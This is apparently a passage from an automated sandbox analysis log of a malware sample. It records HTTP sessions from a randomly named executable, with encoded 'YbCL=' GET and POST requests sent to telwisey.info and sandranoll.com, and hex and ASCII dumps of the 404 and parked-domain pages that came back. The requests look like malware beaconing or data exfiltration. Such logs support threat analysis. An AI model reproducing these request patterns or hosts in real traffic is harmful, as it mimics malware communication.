                                          Jul 4, 2024 16:54:52.052370071 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                          Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                          Jul 4, 2024 16:54:52.057169914 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                          Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          24192.168.2.749731199.192.19.19806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:54:53.975816965 CEST527OUTGET /ei85/?YbCL=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXmSJOUDfP2hLYj3hfUWwVMjhSgAyvEJN1ww7Of4RepeBVRZKy4AbjBLzj&fhW=BLvXr6e0EhyxeX HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.telwisey.info
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:54:54.582721949 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:54:54 GMT
                                          Server: Apache
                                          Content-Length: 16026
                                          Connection: close
                                          Content-Type: text/html; charset=utf-8
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                          Jul 4, 2024 16:54:54.582777023 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37
                                          Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.4
                                          Jul 4, 2024 16:54:54.582789898 CEST1236INData Raw: 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30
                                          Data Ascii: /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.
                                          Jul 4, 2024 16:54:54.582945108 CEST672INData Raw: 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30
                                          Data Ascii: ne" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-lineca
                                          Jul 4, 2024 16:54:54.582957029 CEST1236INData Raw: 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 31 30 2e 36 31 31 22 20 79 31 3d 22 34 39 33 2e 37 31 33 22 20 78 32 3d 22 31 39 30 2e 37 33
                                          Data Ascii: d" stroke-miterlimit="10" x1="210.611" y1="493.713" x2="190.73" y2="493.713" /> </g> </g> <g id="starsSmall"> <g> <line fill="none" stroke="#0E0
                                          Jul 4, 2024 16:54:54.582967997 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61
                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g>
                                          Jul 4, 2024 16:54:54.583002090 CEST1236INData Raw: 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b
                                          Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="
                                          Jul 4, 2024 16:54:54.583014965 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20
                                          Data Ascii: > </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.9
                                          Jul 4, 2024 16:54:54.583026886 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20
                                          Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" />
                                          Jul 4, 2024 16:54:54.583153009 CEST1236INData Raw: 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <
                                          Jul 4, 2024 16:54:54.588082075 CEST1236INData Raw: 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20
                                          Data Ascii: l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" str


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          25192.168.2.749732213.145.228.16806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:54:59.779588938 CEST790OUTPOST /aroo/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.sandranoll.com
                                          Origin: http://www.sandranoll.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.sandranoll.com/aroo/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 38 2b 70 47 64 65 47 38 5a 70 73 32 46 4a 4d 37 64 68 78 39 31 7a 49 44 36 48 4d 53 59 4f 50 77 53 37 33 30 58 79 49 69 6c 51 64 6e 36 4b 47 61 70 77 76 64 4b 43 6e 47 48 49 4f 4e 58 54 65 69 63 30 73 47 56 67 75 57 44 44 34 36 76 2f 6c 42 73 67 6d 41 66 57 4f 48 57 6d 45 6d 6b 48 76 67 54 30 31 31 62 62 50 43 63 58 78 74 41 45 30 33 78 6a 32 31 4f 67 52 41 74 4c 56 5a 6a 4c 72 30 6a 41 72 43 66 43 6d 64 57 6b 38 64 51 63 6b 58 4e 76 70 6c 36 72 38 6b 32 47 65 48 38 66 71 71 4d 6f 6f 48 42 48 53 77 77 68 64 43 36 64 2f 35 42 54 6e 79 36 6c 69 72 2f 71 4c 2b 2f 6d 73 75 55 55 73 58 4f 77 3d 3d
                                          Data Ascii: YbCL=WIabGlVXn4l28+pGdeG8Zps2FJM7dhx91zID6HMSYOPwS730XyIilQdn6KGapwvdKCnGHIONXTeic0sGVguWDD46v/lBsgmAfWOHWmEmkHvgT011bbPCcXxtAE03xj21OgRAtLVZjLr0jArCfCmdWk8dQckXNvpl6r8k2GeH8fqqMooHBHSwwhdC6d/5BTny6lir/qL+/msuUUsXOw==
                                          Jul 4, 2024 16:55:00.535612106 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:55:00 GMT
                                          Server: Apache/2.4.56 (Debian)
                                          X-Powered-By: PHP/7.4.33
                                          Strict-Transport-Security: max-age=63072000; preload
                                          Connection: Upgrade, close
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 64 33 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED]
                                          Data Ascii: d31<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                                          Jul 4, 2024 16:55:00.535774946 CEST1236INData Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e
                                          Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
                                          Jul 4, 2024 16:55:00.535789967 CEST1183INData Raw: 69 6e 67 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 3c 69 6d
                                          Data Ascii: ing Control Panel</h2></td></tr><tr><td style="width:100px;text-align:center;"><img src="https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif" alt="Hosting Control Panel" /></td><td style="width:300px;">Mit dem Domaintechnik
                                          Jul 4, 2024 16:55:00.539392948 CEST5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          26192.168.2.749733213.145.228.16806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:02.327495098 CEST810OUTPOST /aroo/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.sandranoll.com
                                          Origin: http://www.sandranoll.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.sandranoll.com/aroo/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 34 33 77 53 65 4c 30 46 7a 49 69 6d 51 64 6e 78 71 47 62 74 77 76 57 4b 46 75 6d 48 4a 69 4e 58 53 36 69 63 30 38 47 55 58 36 56 52 44 34 30 32 76 6c 44 68 41 6d 41 66 57 4f 48 57 6c 34 41 6b 42 48 67 54 6c 46 31 61 36 50 64 55 33 78 75 44 45 30 33 37 44 32 78 4f 67 51 56 74 4b 4a 7a 6a 4a 6a 30 6a 46 50 43 66 33 4b 63 63 6b 39 55 55 63 6c 6e 48 50 4a 31 38 5a 73 2f 76 31 65 36 79 50 53 53 4e 65 31 6c 62 6c 65 63 75 77 6c 35 2b 66 62 50 57 31 36 48 34 6b 6d 7a 79 49 2f 66 67 52 4a 45 5a 47 4e 54 59 45 41 7a 4a 57 48 46 65 77 4c 52 75 73 49 48 54 65 64 59 69 69 67 3d
                                          Data Ascii: YbCL=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b43wSeL0FzIimQdnxqGbtwvWKFumHJiNXS6ic08GUX6VRD402vlDhAmAfWOHWl4AkBHgTlF1a6PdU3xuDE037D2xOgQVtKJzjJj0jFPCf3Kcck9UUclnHPJ18Zs/v1e6yPSSNe1lblecuwl5+fbPW16H4kmzyI/fgRJEZGNTYEAzJWHFewLRusIHTedYiig=
                                          Jul 4, 2024 16:55:03.049491882 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:55:02 GMT
                                          Server: Apache/2.4.56 (Debian)
                                          X-Powered-By: PHP/7.4.33
                                          Strict-Transport-Security: max-age=63072000; preload
                                          Connection: Upgrade, close
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 64 32 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED]
                                          Data Ascii: d29<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                                          Jul 4, 2024 16:55:03.049530029 CEST1236INData Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e
                                          Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
                                          Jul 4, 2024 16:55:03.049541950 CEST1175INData Raw: 20 50 61 6b 65 74 65 20 62 65 69 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 26 72 65 67 3b 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e
                                          Data Ascii: Pakete bei Domaintechnik&reg;</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;width:75px;height:75px;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/pakete11.png" alt="Hosting Pakete" /></td><td
                                          Jul 4, 2024 16:55:03.052833080 CEST5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          27192.168.2.749734213.145.228.16806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:04.866548061 CEST1823OUTPOST /aroo/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.sandranoll.com
                                          Origin: http://www.sandranoll.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.sandranoll.com/aroo/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 37 58 77 53 73 7a 30 47 55 63 69 6e 51 64 6e 38 4b 47 65 74 77 76 4c 4b 45 4b 71 48 4a 2f 32 58 51 79 69 65 58 6b 47 46 56 43 56 4c 54 34 30 2b 50 6c 47 73 67 6d 76 66 57 65 44 57 6c 6f 41 6b 42 48 67 54 6d 64 31 63 72 50 64 53 33 78 74 41 45 30 7a 78 6a 32 56 4f 67 35 75 74 4b 4e 4a 67 39 76 30 6a 6c 2f 43 64 68 65 63 42 55 39 57 5a 38 6c 2f 48 50 45 79 38 5a 41 64 76 32 43 63 79 49 2b 53 4d 62 34 76 42 33 57 2f 30 6d 68 68 30 4d 37 6c 65 48 4b 4c 79 55 6d 59 79 4b 66 69 69 44 56 46 53 77 42 42 51 79 68 48 58 32 71 30 48 43 48 44 71 62 46 63 41 73 4a 36 78 54 6c 59 34 57 31 4d 4e 35 71 35 6d 47 53 54 77 72 37 44 42 6b 73 79 66 6e 62 6d 68 76 6a 54 4a 38 79 75 52 70 4e 52 7a 48 65 6e 57 42 76 53 63 2b 36 56 51 76 42 54 69 4a 38 5a 4c 58 6c 6f 4f 51 30 73 63 4b 4b 73 52 6d 79 6d 79 34 37 42 7a 75 4f 6e 52 57 66 35 61 4f 35 4b 39 5a 67 6d 50 44 31 53 46 64 4e 30 5a [TRUNCATED]
                                          Data Ascii: YbCL=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b7XwSsz0GUcinQdn8KGetwvLKEKqHJ/2XQyieXkGFVCVLT40+PlGsgmvfWeDWloAkBHgTmd1crPdS3xtAE0zxj2VOg5utKNJg9v0jl/CdhecBU9WZ8l/HPEy8ZAdv2CcyI+SMb4vB3W/0mhh0M7leHKLyUmYyKfiiDVFSwBBQyhHX2q0HCHDqbFcAsJ6xTlY4W1MN5q5mGSTwr7DBksyfnbmhvjTJ8yuRpNRzHenWBvSc+6VQvBTiJ8ZLXloOQ0scKKsRmymy47BzuOnRWf5aO5K9ZgmPD1SFdN0ZqyUQqYT9GNbIwsmn4qhVMJ/xREOF8U66xQaAKQ1NzV3tahO7/OkVTB/3FV1zxXYBAvHrnV3MiOZv3U1SX6aQ/LpYzgfK5f4zJVKr4nUAxzJ5YPOIdqwVF8IbMsFInPOxcV2G4uo1QZBPCNSGAEeUFWw4GwtAAbgv6XxbCiVR9JK8tLc404W3l/+XVMieI7FhwOUEXRM94fqFkcxckIgX6b/OYJiovq/iO9Nvh2mx8ZpkHUKPMzhSVsKSqQEsOwUfqg4HwGqVIzNk/CqzKbIbYJM/KMr27IkjCq8FOIJ1DTwLQ7D/379Y9GR3BNRAAmUBuSgft+TWXZ7KAzDXEB85nJEhf0zHFHv1RKpxIYweNLo5oj4tSiYTJSWSoFgY41v9uWJzfPcrzUJUMWsABQpdogDSr48Ua9nsvuHL1tcVimboLooOdqMIqmob0R/Pi2/jU/4dsBF7HVdCuec9kD4joxJZ5Io1BuVqDJZ2BNYnd3Cuy4AyPadOqj0xkI6BOGI531kbLM6HYK2m/5woYgToRjPHX3ja/s31NJeG2dZu2xLbCbQ1idbwKlAXhd3yj07y/lDoGJkJ0TnT4yg09o3